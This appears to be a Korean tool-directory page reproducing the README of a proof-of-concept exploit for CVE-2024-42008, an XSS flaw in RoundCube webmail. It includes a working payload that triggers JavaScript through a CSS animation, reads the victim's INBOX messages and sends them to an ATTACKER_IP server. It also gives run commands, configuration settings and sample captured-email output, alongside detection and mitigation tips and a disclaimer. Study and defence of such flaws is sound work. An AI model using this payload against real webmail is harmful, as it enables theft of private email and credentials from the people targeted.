Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Roundcube-CVE-2024-42008-POC — # CVE-2024-42008 개념 증명 익스플로잇 RoundCube 웹메일의 XSS(교차 사이트 스크립팅) 취약점인 CVE-2024-42008에 대한 개념 증명 익스플로잇입니다. 연락처 양식을 통해 XSS 페이로드를 전달하여 승인된 침투 테스트 환경에서 이메일, 자격 증명 및 세션 토큰을 탈취합니다. | Kitploit
도구/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPhishingCTFLearning & Education
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

# CVE-2024-42008 개념 증명 익스플로잇 RoundCube 웹메일의 XSS(교차 사이트 스크립팅) 취약점인 CVE-2024-42008에 대한 개념 증명 익스플로잇입니다. 연락처 양식을 통해 XSS 페이로드를 전달하여 승인된 침투 테스트 환경에서 이메일, 자격 증명 및 세션 토큰을 탈취합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
저장소 보기
191년 전아직 검토되지 않음
공유

CVE-2024-42008 RoundCube XSS 익스플로잇

개요

이 저장소는 RoundCube 웹메일 애플리케이션의 XSS(Cross-Site Scripting) 취약점인 CVE-2024-42008에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이 익스플로잇은 교육 목적과 HackTheBox와 같은 통제된 침투 테스트 환경을 위해 설계되었습니다.

취약점 상세

CVE-2024-42008 요약

  • CVE ID: CVE-2024-42008
  • 유형: 크로스 사이트 스크립팅(XSS)
  • CVSS 점수: 높음
  • 영향받는 버전:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • 수정된 버전: 1.5.8, 1.6.8+

기술적 세부 사항

이 취약점은 rcmail_action_mail_get->run()에 존재하며, 원격 공격자가 피해자의 브라우저에서 임의의 JavaScript를 실행할 수 있게 합니다. 이 결함은 이메일 콘텐츠를 처리할 때 입력 검증이 충분하지 않기 때문에 발생하며, 특히 CSS 애니메이션 및 JavaScript 실행 컨텍스트 처리에서 문제가 됩니다.

주요 공격 벡터:

  • 연락처 양식 또는 이메일 메시지를 통해 주입된 악성 HTML 콘텐츠
  • JavaScript 실행을 트리거하는 데 사용되는 CSS 애니메이션 속성
  • onanimationstart 이벤트 핸들러가 콘텐츠 필터를 우회
  • JavaScript 페이로드가 웹메일 애플리케이션의 컨텍스트에서 실행
  • 영향

    성공적인 익스플로잇을 통해 공격자는 다음을 수행할 수 있습니다:

    • 피해자의 이메일 탈취 (INBOX 및 기타 폴더에서)
    • 이메일 메타데이터 유출 (UID, 메시지 목록)
    • 이메일 원본 코드 및 첨부 파일에 접근
    • 피해자 계정으로 이메일 발송
    • 로그인 자격 증명 및 세션 토큰 수집
    • 피해자를 대신하여 작업 수행

    익스플로잇 스크립트 분석

    스크립트 구조

    이 익스플로잇은 세 가지 주요 구성 요소로 이루어져 있습니다:

    1. XSS 페이로드 전달: 연락처 양식을 통해 악성 HTML 전송
    2. HTTP 서버: 유출된 데이터 수신 대기
    3. 데이터 처리: 탈취한 이메일 캡처 및 로깅

    페이로드 분석

    root@kitploit:~
    // The core XSS payload uses CSS animations to trigger JavaScript
    <body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
      // 1. Fetch email list from victim's INBOX
      fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
      .then(r=>r.text())
      .then(t=>{
        // 2. Extract email UIDs using regex
        [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
          // 3. For each email, fetch full source
          fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
          .then(r=>r.text())
          .then(data=>{
            // 4. Exfiltrate email data to attacker server
            fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
          })
        })
      })
    ; foo=bar">
    

    주요 기능

    • 연속 작동: 정기적인 간격으로 페이로드 전송 가능
    • 스텔스 모드: 최소한의 발자국과 오류 처리
    • 데이터 로깅: 유출된 이메일 자동 캡처 및 저장
    • 디버그 모드: 트래픽 분석을 위한 프록시 지원
    • 구성 가능: 다양한 명령줄 옵션

    사용법

    사전 요구 사항

    root@kitploit:~
    pip install requests
    

    기본 사용법

    root@kitploit:~
    # Single payload delivery
    python cve-2024-42008-exploit.py
    
    # Continuous mode (every 30 seconds)
    python cve-2024-42008-exploit.py -c
    
    # Custom interval (every 60 seconds)
    python cve-2024-42008-exploit.py -c -i 60
    
    # Debug mode with proxy
    python cve-2024-42008-exploit.py -d
    

    설정

    스크립트를 편집하여 다음을 구성하세요:

    • ATTACKER_IP: 공격자 수신 서버 IP
    • ATTACKER_PORT: 유출된 데이터를 수신하는 포트
    • RECIPIENT_EMAIL: 대상 이메일 주소
    • TARGET_URL: 취약한 RoundCube 인스턴스
    • PROXY: 디버깅용 프록시 서버 (Burp Suite/Caido)

    명령줄 옵션

    옵션설명
    -d, --debug프록시 지원 디버그 모드 활성화
    -c, --continuous페이로드를 연속적으로 전송
    -i, --interval페이로드 간 간격 (기본값: 30초)

    공격 흐름

    1. 페이로드 주입: 스크립트가 연락처 양식을 통해 악성 HTML 전송
    2. 이메일 전달: 취약한 RoundCube가 이메일을 처리하고 전달
    3. 피해자 상호작용: 사용자가 악성 이메일을 열람/확인
    4. XSS 실행: CSS 애니메이션이 JavaScript 페이로드 트리거
    5. 데이터 유출: JavaScript가 이메일을 탈취하여 공격자에게 전송
    6. 데이터 캡처: 익스플로잇 서버가 탈취된 데이터를 수신하고 로깅

    탐지 및 완화

    방어자를 위한 안내

    탐지 지표:

    • 이메일 콘텐츠의 비정상적인 CSS 애니메이션 속성
    • HTML의 onanimationstart 이벤트 핸들러
    • 이메일 메시지의 의심스러운 JavaScript
    • 웹메일에서 알 수 없는 도메인으로의 외부 요청
    • 반복적인 연락처 양식 제출

    완화 전략:

    • RoundCube를 버전 1.5.8 또는 1.6.8+로 업데이트
    • CSP(Content Security Policy) 구현
    • 이메일 콘텐츠 필터링 활성화
    • 의심스러운 외부 트래픽 모니터링
    • 웹메일 구성에 대한 정기적인 보안 감사

    침투 테스터를 위한 안내

    테스트 고려 사항:

    • 테스트 전 적절한 권한 확인
    • 보고를 위한 모든 활동 문서화
    • 격리된 환경에서만 테스트
    • 대상이 의도적으로 취약한지 확인
    • 책임 있는 공개 절차 준수

    법적 및 윤리적 고려 사항

    ⚠️ 경고: 이 익스플로잇은 교육 목적 및 승인된 테스트 용도로만 제공됩니다.

    • 소유한 시스템 또는 테스트에 대한 명시적 허가가 있는 시스템에서만 사용
    • HackTheBox 및 유사한 학습 플랫폼을 위해 설계됨
    • 무단 사용은 현지 및 국제 법률을 위반할 수 있음
    • 항상 책임 있는 공개 절차를 준수
    • 개인정보 보호 및 데이터 보호 규정 준수

    기술 참고 자료

    • CVE-2024-42008 공식 항목
    • RoundCube 보안 권고
    • CWE-79: 크로스 사이트 스크립팅

    출력 예시

    root@kitploit:~
    [+] Listening on 10.10.14.209:8001 for exfiltrated data...
    [2024-07-09 10:30:15] POST Request Sent! Status Code: 200
    
    [+] 📩 Captured Email Data:
    Return-Path: <[email protected]>
    Received: from localhost (localhost [127.0.0.1])
    ...
    [Email content]
    --------------------------------------------------
    [+] 🔥 Email data saved to emails.log
    

    면책 조항

    이 코드는 교육 목적 및 승인된 침투 테스트 용도로만 제공됩니다. 저자는 이 소프트웨어로 인한 오용이나 손해에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 적절한 권한이 있는지 확인하세요.

    도구 다운로드